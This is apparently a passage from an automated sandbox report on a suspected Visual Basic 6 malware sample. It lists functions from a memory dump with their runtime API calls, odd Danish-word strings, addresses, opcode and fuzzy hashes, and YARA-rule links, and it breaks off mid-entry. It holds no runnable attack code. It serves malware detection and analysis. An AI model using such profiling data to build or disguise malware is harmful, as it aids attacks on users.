API ID: __vba$Free$CheckHresult$CopyNew2$#524List
String ID: ~V
API String ID: 592294731-4105715531
Opcode ID: 89048570029fffa1f91386bcbfdd8a3cb8ea5f3de96dec376b2b756c6e2c6859
Instruction ID: b184b76a7f354287624ead317bd2e79e775bdd7692784707268617388805fbdd
Opcode Fuzzy Hash: 89048570029fffa1f91386bcbfdd8a3cb8ea5f3de96dec376b2b756c6e2c6859
Instruction Fuzzy Hash: 25515EB4E00219EFCB04DF95D989ADEBBB8FF98701F50802AE505B72A1C7B45905CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414400, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

__vbaI4Str.MSVBVM60(00403988), ref: 00414451
#608.MSVBVM60(?,00000000), ref: 0041445C
__vbaVarTstNe.MSVBVM60(?,?), ref: 00414478
__vbaFreeVar.MSVBVM60 ref: 00414484
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004144A6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004144C5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403998,00000120), ref: 004144E8
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414501
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041451A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004039A8,00000148), ref: 0041453D
__vbaInStrVar.MSVBVM60(?,00000000,00008008,?,?), ref: 00414574
__vbaI4Var.MSVBVM60(00000000), ref: 0041457B
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041458B
__vbaFreeVarList.MSVBVM60(00000002,00000009,?), ref: 0041459B

Strings

~V, xrefs: 00414493, 0041449C, 004144AC, 004144EE, 004144F7, 00414507
passulate, xrefs: 00414566

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListNew2$#608
String ID: ~V$passulate
API String ID: 821347214-1682215503
Opcode ID: 043552ca83b47cd60f0dee6fe8753cce1958c57d247fbcf17945a6dd88337b53
Instruction ID: a720e0adc94b0af0eddaba7418f4cb1a1fba3a3998fb902d047809e2c34e987c
Opcode Fuzzy Hash: 043552ca83b47cd60f0dee6fe8753cce1958c57d247fbcf17945a6dd88337b53
Instruction Fuzzy Hash: 00512FB5901208AFCB10DF94DA88EEEBBB9FB48701F60452AF545F72A0D7745A09CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041B3B0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 129COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041B3F6
#594.MSVBVM60(?), ref: 0041B40F
__vbaFreeVar.MSVBVM60 ref: 0041B418
__vbaVarDup.MSVBVM60 ref: 0041B432
#544.MSVBVM60(?,?), ref: 0041B440
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041B45C
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041B46F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033B0,000002B0), ref: 0041B4E1
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041B4FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B513
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A44,000001E8), ref: 0041B536
__vbaFreeObj.MSVBVM60 ref: 0041B53F
__vbaFreeStr.MSVBVM60(0041B577), ref: 0041B570

Strings

20:20:20, xrefs: 0041B424
~V, xrefs: 0041B4E7, 0041B4F0, 0041B500

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#544#594CopyListNew2
String ID: ~V$20:20:20
API String ID: 225108240-2807202695
Opcode ID: 757014df9ee4521e68bb7cc143de70918ada4509e6dde8cc2b0843e9f0338677
Instruction ID: ee1e54eec1dcaa09972d400c28673cca990cab8acd99310e0dced0f90cde25ae
Opcode Fuzzy Hash: 757014df9ee4521e68bb7cc143de70918ada4509e6dde8cc2b0843e9f0338677
Instruction Fuzzy Hash: F8511BB4900249EFCB04DF98D989ADEBFB9FF48704F10812AE909BB260D7745945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00414C80, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 108COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414CD3
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414CF2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 00414D36
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414D45
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414D5A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414D73
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004039A8,000001C0), ref: 00414D92
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414D9B
#587.MSVBVM60(00000000,3FF00000), ref: 00414DA4
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414DAA
#580.MSVBVM60(Styringscomputeren,00000001), ref: 00414DC4

Strings

KANTSTENENS, xrefs: 00414D05
Styringscomputeren, xrefs: 00414DBF
~V, xrefs: 00414CB7, 00414CC9, 00414CD9, 00414D47, 00414D50, 00414D60

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$#580#587
String ID: ~V$KANTSTENENS$Styringscomputeren
API String ID: 1664163399-502822996
Opcode ID: 9335fc03d02f5c424b1e54372d79ae5e4314ce2a69b3d0e7fd475ee54491acaf
Instruction ID: c8ebd09f39fcf37296da11699790869e3dee045319de64c2d087418750487dcf
Opcode Fuzzy Hash: 9335fc03d02f5c424b1e54372d79ae5e4314ce2a69b3d0e7fd475ee54491acaf
Instruction Fuzzy Hash: 1B416574A00214AFCB109FA4DE49F9A7BB8FF49B01F10456AF945F72A1C6789941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00414230, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041427A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414299
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004142B0
__vbaObjSet.MSVBVM60(?,00000000), ref: 004142C9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,00000218), ref: 004142EC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 00414331
__vbaFreeStr.MSVBVM60 ref: 0041433A
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0041434A
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414366
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041437F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403974,00000088), ref: 004143A2
__vbaFreeObj.MSVBVM60 ref: 004143B1

Strings

~V, xrefs: 00414259, 00414270, 00414280, 0041429D, 004142A6, 004142B6, 00414350, 0041435C, 0041436C

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID: ~V
API String ID: 2509323985-4105715531
Opcode ID: 89b09fe7a8c0bad75112c16c5a4f821adb67216c5b0d2b90f0d5626c721011e8
Instruction ID: bd4f3bcfdd3a49b310a1186cc953aee4e5bb32ad326e297d90bc9e54f9a459bf
Opcode Fuzzy Hash: 89b09fe7a8c0bad75112c16c5a4f821adb67216c5b0d2b90f0d5626c721011e8
Instruction Fuzzy Hash: 6741A574A40205AFC710DFA8CD89FAE7BB8FB48701F508529F945F72A0D7749942CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90, Relevance: 21.1, APIs: 14, Instructions: 132COMMON

Download Yara Rule

APIs

#610.MSVBVM60(?), ref: 00413DE9
#661.MSVBVM60(?,004038C4,00000000,3FF00000,?), ref: 00413DFE
#610.MSVBVM60(?), ref: 00413E08
__vbaVarAdd.MSVBVM60(?,?,?,?), ref: 00413E28
__vbaVarTstNe.MSVBVM60(00000000), ref: 00413E2F
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00413E4A
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 00413E6A
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000048), ref: 00413E94
__vbaStrMove.MSVBVM60 ref: 00413EA3
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 00413EBB
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000014), ref: 00413EE0
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000000B8), ref: 00413F0D
__vbaFreeObj.MSVBVM60 ref: 00413F16
__vbaFreeStr.MSVBVM60(00413F60), ref: 00413F59

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#610New2$#661ListMove
String ID:
API String ID: 4150538313-0
Opcode ID: b907206e50fd801bdd7e5a96b71378b5c4d7d00ffc30da550df5c7dad7ad6f28
Instruction ID: 7c13e0e12ee1b0e69ea596fb58e85e17f580676734c9801b62a85d0cd6cd226f
Opcode Fuzzy Hash: b907206e50fd801bdd7e5a96b71378b5c4d7d00ffc30da550df5c7dad7ad6f28
Instruction Fuzzy Hash: 09413A71D00219ABCB10DF94DD89EEEBBB8FF58702F10412AF505B71A0D7B85A45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004140B0, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004140F0
#676.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,?,?), ref: 00414126
__vbaFpR8.MSVBVM60 ref: 0041412C
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00414157
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 00414177
__vbaCastObj.MSVBVM60(?,00403964,ekspeditricerne), ref: 00414193
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041419E
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000040), ref: 004141B8
__vbaFreeObj.MSVBVM60 ref: 004141C1
__vbaFreeObj.MSVBVM60(0041420D), ref: 004141FD
__vbaFreeStr.MSVBVM60 ref: 00414206

Strings

ekspeditricerne, xrefs: 00414186

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#676CastCheckCopyHresultListNew2
String ID: ekspeditricerne
API String ID: 2764453826-1880822252
Opcode ID: ec92d1c641b4a8588fa01a44b40a8784de6df7df5981043949c6abdfad48be37
Instruction ID: 55a529942a2abef0ef53804cd337b9b1c43d544943ff176434d9c9e8e7f1001f
Opcode Fuzzy Hash: ec92d1c641b4a8588fa01a44b40a8784de6df7df5981043949c6abdfad48be37
Instruction Fuzzy Hash: FE314174900209ABCB14DFA5DE49BEEBBB8FB58701F20412AF905B72A0D7781941CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041B590, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041B5D9
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041B5F2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041B60B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403974,0000016C), ref: 0041B62E
__vbaFreeObj.MSVBVM60 ref: 0041B637
#516.MSVBVM60(00403994), ref: 0041B642
__vbaVarDup.MSVBVM60 ref: 0041B67E
#595.MSVBVM60(?,00000000,?,?,?), ref: 0041B695
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041B6AD
__vbaFreeStr.MSVBVM60(0041B6EC), ref: 0041B6E5

Strings

~V, xrefs: 0041B5DF, 0041B5E8, 0041B5F8
Festerment9, xrefs: 0041B670

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#516#595CheckCopyHresultListNew2
String ID: ~V$Festerment9
API String ID: 1659224419-2157709024
Opcode ID: b2aeb65142573d5fe901c87d83c742be09dee556bc16f3c26c4b1b00d0ebedeb
Instruction ID: 53ed29f74fde7952dee4cd02d1fbb33472ec7d7b610a23b2bce9233dcf64fd20
Opcode Fuzzy Hash: b2aeb65142573d5fe901c87d83c742be09dee556bc16f3c26c4b1b00d0ebedeb
Instruction Fuzzy Hash: C0414AB0900209AFCB14DF94D988EEEBFB9FF58705F10412AF506B72A0D7745985CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413F80, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00413FCF
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00413FD7
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00413FEC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414005
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 0041404D
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00414056
__vbaFreeStr.MSVBVM60(00414086), ref: 0041407E
__vbaFreeStr.MSVBVM60 ref: 00414083

Strings

~V, xrefs: 00413FD9, 00413FE2, 00413FF2
IO"K, xrefs: 0041405C
GENFREMSTILLINGEN, xrefs: 0041401C

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$CheckHresultNew2
String ID: ~V$GENFREMSTILLINGEN$IO"K
API String ID: 1874231197-65567899
Opcode ID: 6cd19fc0849da6ca61c3d8a1900d49aad4d84394a17de8e708caac429ded8e77
Instruction ID: 3bcccc7e19efbcd55cc66d024347dc0deea4c05fa5420e31236ea7d2334462a8
Opcode Fuzzy Hash: 6cd19fc0849da6ca61c3d8a1900d49aad4d84394a17de8e708caac429ded8e77
Instruction Fuzzy Hash: B3313C71A00219AFCB04DFA9D985ADEBFB9FF58700F10816AE905F72A0C7749941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00414E20, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__vbaVarTstNe.MSVBVM60(?,?), ref: 00414E75
#531.MSVBVM60(Luksusvrelsernes), ref: 00414E85
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414E9E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414EB7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 00414F05
__vbaFreeObj.MSVBVM60 ref: 00414F0E

Strings

Luksusvrelsernes, xrefs: 00414E80
~V, xrefs: 00414E8B, 00414E94, 00414EA4
0:|J, xrefs: 00414F14
Balancegangs8, xrefs: 00414EDE

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#531CheckFreeHresultNew2
String ID: ~V$0:|J$Balancegangs8$Luksusvrelsernes
API String ID: 1326136531-1417283580
Opcode ID: a330ef5ed6b7e1984ea38177a7e7ec729ea7b025d703b2c5aa28ee44440ee5c4
Instruction ID: 9f25caa90e27e1664336a2ba5c0307f928233f21a46b5a30845424e885f1fdc7
Opcode Fuzzy Hash: a330ef5ed6b7e1984ea38177a7e7ec729ea7b025d703b2c5aa28ee44440ee5c4
Instruction Fuzzy Hash: 30314CB4E00209AFCB14DF99D989B9EBBB8FB48701F50802AF545B7390C7B85905CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00414600, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041466D
__vbaR4Str.MSVBVM60(004039D4), ref: 00414678
__vbaVarDup.MSVBVM60 ref: 004146E3
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 0041470B
__vbaStrMove.MSVBVM60 ref: 00414716
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 00414740
__vbaFreeStr.MSVBVM60(0041479E), ref: 00414796
__vbaFreeStr.MSVBVM60 ref: 0041479B

Strings

Bibeskftigelsernes, xrefs: 004146CF

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#596CopyListMove
String ID: Bibeskftigelsernes
API String ID: 2863382718-3164189337
Opcode ID: 4ce8b09bf23f6c0191436d399202ad902e09a7404220aca9b66ff6dbeca060c6
Instruction ID: de3136ded7a5595d174bebf7e2866268750d11e733ede43361adfcdc4523819f
Opcode Fuzzy Hash: 4ce8b09bf23f6c0191436d399202ad902e09a7404220aca9b66ff6dbeca060c6
Instruction Fuzzy Hash: A741C5B1D01219DFCB14CF99DA44ADEBBB8FB48700F20816BE20AB7250DB741A49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004205C0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

#705.MSVBVM60(?,00000000), ref: 00420604
__vbaStrMove.MSVBVM60 ref: 0042060F
__vbaFreeVar.MSVBVM60 ref: 00420618
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00420631
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042064A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A44,00000208), ref: 0042066D
__vbaFreeObj.MSVBVM60 ref: 00420676
__vbaFreeStr.MSVBVM60(004206A0), ref: 00420699

Strings

~V, xrefs: 0042061E, 00420627, 00420637

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#705CheckHresultMoveNew2
String ID: ~V
API String ID: 1968677507-4105715531
Opcode ID: fab06b37da449edf582610412f231e52382c7487734dfef446431d987ebf08e5
Instruction ID: 23c9b0eb187dba5e8bc8e66f1088f350938ecd144d8c5ebf8ff0a6bc68b44767
Opcode Fuzzy Hash: fab06b37da449edf582610412f231e52382c7487734dfef446431d987ebf08e5
Instruction Fuzzy Hash: B4214D74A00205ABCB10DF94DE4DEAEBBB8FB98705F500026F542F71B1D7745945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00421620, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 00421667
__vbaObjSet.MSVBVM60(?,00000000), ref: 00421686
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A18,000000F8), ref: 004216A9
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004216C2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004216DB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A54,00000130), ref: 0042176A
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042177A

Strings

~V, xrefs: 00421649, 0042165D, 0042166D, 004216AF, 004216B8, 004216C8

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresultNew2$FreeList
String ID: ~V
API String ID: 1549294082-4105715531
Opcode ID: b144720532af0f174dfe7049aa8cbfc755f69c2e3176ddb03c5aa06d11b26231
Instruction ID: e24e6cc5932cab99e0d4c568653f0320fc3929ff0aa7a0eb869659f49d6de306
Opcode Fuzzy Hash: b144720532af0f174dfe7049aa8cbfc755f69c2e3176ddb03c5aa06d11b26231
Instruction Fuzzy Hash: 58413174A00204AFCB14DF98D989A9EBBF9FF48700F50846AE905F73A1D7749905CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C340, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041C386
#516.MSVBVM60(00403994), ref: 0041C391
__vbaVarDup.MSVBVM60 ref: 0041C3CD
#595.MSVBVM60(?,00000000,?,?,?), ref: 0041C3E4
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041C3FC
__vbaFreeStr.MSVBVM60(0041C432), ref: 0041C42B

Strings

Udmarvnings8, xrefs: 0041C3BF

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#516#595CopyList
String ID: Udmarvnings8
API String ID: 515552688-761385786
Opcode ID: 408322e763dd10158d6e3776d23a99670f517de8c50d4ddd17832d1dd6156e3f
Instruction ID: 49d2027c464da82284c17f3e9689f89c85e0de5fc845965763aa3ed5e69a16e5
Opcode Fuzzy Hash: 408322e763dd10158d6e3776d23a99670f517de8c50d4ddd17832d1dd6156e3f
Instruction Fuzzy Hash: 3921EAB1C41249AFCB04DFD8DA45ADEBBB8EB08705F20812AF506B7254D7746E09CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF50, Relevance: 12.0, APIs: 8, Instructions: 46COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FF93
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FF9B
#536.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FFAC
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FFB7
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FFC0
__vbaFreeStr.MSVBVM60(0041FFED,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FFE0
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FFE5
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041FFEA

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#536Move
String ID:
API String ID: 754517999-0
Opcode ID: 21e99b8c78357edbfd649c1c832de24053ce3619fc89fbf2dca17c843f49990a
Instruction ID: 12b37190ffe7c97bb950fafe5263ae1af75b7324872d312aeb5bda6267af02bc
Opcode Fuzzy Hash: 21e99b8c78357edbfd649c1c832de24053ce3619fc89fbf2dca17c843f49990a
Instruction Fuzzy Hash: 5D11EC71D0020D9FCB04DFA8D945AEEBBB4FB58700F108126E506F72A4EB746A06CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041CBB3
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041CBCC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004039A8,000001C4), ref: 0041CBEF
__vbaFreeObj.MSVBVM60 ref: 0041CBF8

Strings

~V, xrefs: 0041CB99, 0041CBA9, 0041CBB9

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: ~V
API String ID: 1645334062-4105715531
Opcode ID: c4edb178d12cbf06ecc128d12321ad9ca0e2ce49e406342767f62a5529b52c87
Instruction ID: 02b16019189cf2fa7e54c6553fd848a62561e2699fc34765bfc5cab9c1e798bd
Opcode Fuzzy Hash: c4edb178d12cbf06ecc128d12321ad9ca0e2ce49e406342767f62a5529b52c87
Instruction Fuzzy Hash: A2018C74680205BBD7109F64DE89FAA7BBCFB04B01F500466F941F72A0E6B89904CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00421330, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

